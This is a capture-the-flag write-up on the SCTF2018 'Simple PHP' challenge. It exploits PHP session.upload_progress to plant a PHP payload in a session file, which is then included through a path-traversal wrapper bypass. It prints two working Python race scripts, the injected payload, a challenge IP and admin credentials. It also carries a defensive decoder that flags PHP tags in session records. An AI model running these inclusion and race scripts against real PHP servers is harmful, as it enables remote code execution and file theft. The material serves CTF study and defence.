Using SCTF2018 BabySyc - Simple PHP as the example
Official solution:
https://www.cnblogs.com/iamstudy/articles/sctf2018_simple_php_web_writeup.html
The session upload approach is an unintended solution.
A few reference links on session.upload_progress:
https://xz.aliyun.com/t/2148
http://php.net/manual/zh/session.upload-progress.php
http://skysec.top/2018/04/04/amazing-phpinfo/
Reading phpinfo through the file inclusion:
http://116.62.71.206:52872/?f=phpinfo.php
phpinfo shows that
session.upload_progress.enabled = on
which means the session file can be overwritten through the upload progress feature. session.upload_progress.cleanup is also on, so the progress entry is removed as soon as the upload finishes and a race is needed; the race script is attached at the bottom.
The session content that actually gets included here is:
admin|i:1;upload_progress_<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>|a:5:{s:10:"start_time";i:1529519759;s:14:"content_length";i:90736;s:15:"bytes_processed";i:5291;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:6:"upload";s:4:"name";s:7:"tmp.jpg";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1529519759;s:15:"bytes_processed";i:0;}}}
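As an added example that is not part of the original write-up: a defender-side decoder for the sess_* record format shown above. It parses the `name|<serialized value>` records (only the types the upload_progress entry uses) and flags any client-chosen upload_progress_<name> key that carries a PHP open tag, which is what to look for when auditing session storage or when deciding whether the PHP_SESSION_UPLOAD_PROGRESS field should be filtered. It assumes session files are read as latin-1 so that PHP's byte-length prefixes line up with Python string offsets.

```python
import re

# Minimal decoder for PHP's default "php" session serializer: the file is a run of
# `name|<serialized value>` records. Covers i (int), b (bool), s (string), N (null), a (array).
def _unserialize(data, pos):
    t = data[pos]
    if t == 'N':
        return None, pos + 2                          # 'N;'
    if t in 'ib':
        end = data.index(';', pos)
        n = int(data[pos + 2:end])                    # 'i:123;' / 'b:0;'
        return (bool(n) if t == 'b' else n), end + 1
    if t == 's':
        colon = data.index(':', pos + 2)
        n = int(data[pos + 2:colon])                  # 's:<len>:"...";' is length-prefixed,
        start = colon + 2                             # so quotes or '|' inside are harmless
        return data[start:start + n], start + n + 2   # skip closing '";'
    if t == 'a':
        colon = data.index(':', pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                               # skip ':{'
        out = {}
        for _ in range(count):
            k, pos = _unserialize(data, pos)
            out[k], pos = _unserialize(data, pos)
        return out, pos + 1                           # skip '}'
    raise ValueError('unsupported type %r at offset %d' % (t, pos))

def parse_session(text):
    """Return {key: value} for every record in a sess_* file (open it with encoding='latin-1')."""
    entries, pos = {}, 0
    while pos < len(text):
        bar = text.index('|', pos)
        key = text[pos:bar]
        entries[key], pos = _unserialize(text, bar + 1)
    return entries

PHP_TAG = re.compile(r'<\?|<script', re.I)

def find_injected(entries):
    """Keys carrying PHP tags; upload_progress_<name> is chosen by the client, so it is the one to watch."""
    return [k for k in entries if PHP_TAG.search(k)]

# Constructed input: the session record quoted in the write-up above.
SAMPLE = 'admin|i:1;upload_progress_<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>|a:5:{s:10:"start_time";i:1529519759;s:14:"content_length";i:90736;s:15:"bytes_processed";i:5291;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:6:"upload";s:4:"name";s:7:"tmp.jpg";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1529519759;s:15:"bytes_processed";i:0;}}}'

if __name__ == '__main__':
    for hit in find_injected(parse_session(SAMPLE)):
        print('session key carrying PHP tags:', hit)
```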
Pitfalls encountered
The challenge uses a .so to implement PHP encryption and decryption, and the file inclusion loads the encrypted index.php, so anything included must also be encrypted PHP code. However, the session only lets us control the fragment <?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>
, so at most that fragment could be encrypted; the rest of the session content stays unencrypted and would still make decryption fail.
Fortunately, so that players could use PHP wrappers, the challenge left a "backdoor" that parses PHP directly with no encryption step; it only checks for ://
So the payload can bypass the encrypt/decrypt step, include the session file and have it parsed as PHP directly:
http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_qc2kavokdjiiepu283hduivod2
SessionUpload.py
# coding: utf-8
import requests
import time

# log in as admin to obtain a PHPSESSID
url = 'http://116.62.71.206:52872/?f=login.php'
data = {'name': 'admin', 'pass': 'sctf2018_h656cDBkU2'}
r = requests.post(url, data=data)
PHPSESSID = r.cookies['PHPSESSID']
print('input the PHPSESSID in include.py' + '\n' + PHPSESSID)
time.sleep(10)
while 1:
    url = 'http://116.62.71.206:52872/?f=upload_sctf2018_C9f7y48M75.php'
    files = {
        "PHP_SESSION_UPLOAD_PROGRESS": (None, '<?php echo file_get_contents("/tmp/flag_56CcE97QGNxDEXNpW3HY");?>'),
        "upload": ("tmp.jpg", open("tmp.png", "rb"), "image/png"),
        "submit": (None, "submit")
    }
    #proxies = {'http':'http://127.0.0.1:8080'}
    headers = {'Cookie': 'PHPSESSID=' + PHPSESSID}
    r = requests.post(url, files=files, headers=headers)
    print(r.text)
    print(PHPSESSID)
# cleanup is on, so a race is needed, and the same session must be kept alive
include.py
# coding: utf-8
import requests

# the PHPSESSID printed by SessionUpload.py
PHPSESSID = 'qc2kavokdjiiepu283hduivod2'
while 1:
    # keep including the session file until the upload_progress entry is present
    url = 'http://116.62.71.206:52872/?f=aa://../../../../var/lib/php/sessions/sess_' + PHPSESSID
    print(url)
    r = requests.get(url)
    if 'SCTF' in r.text:
        print(r.text)
        break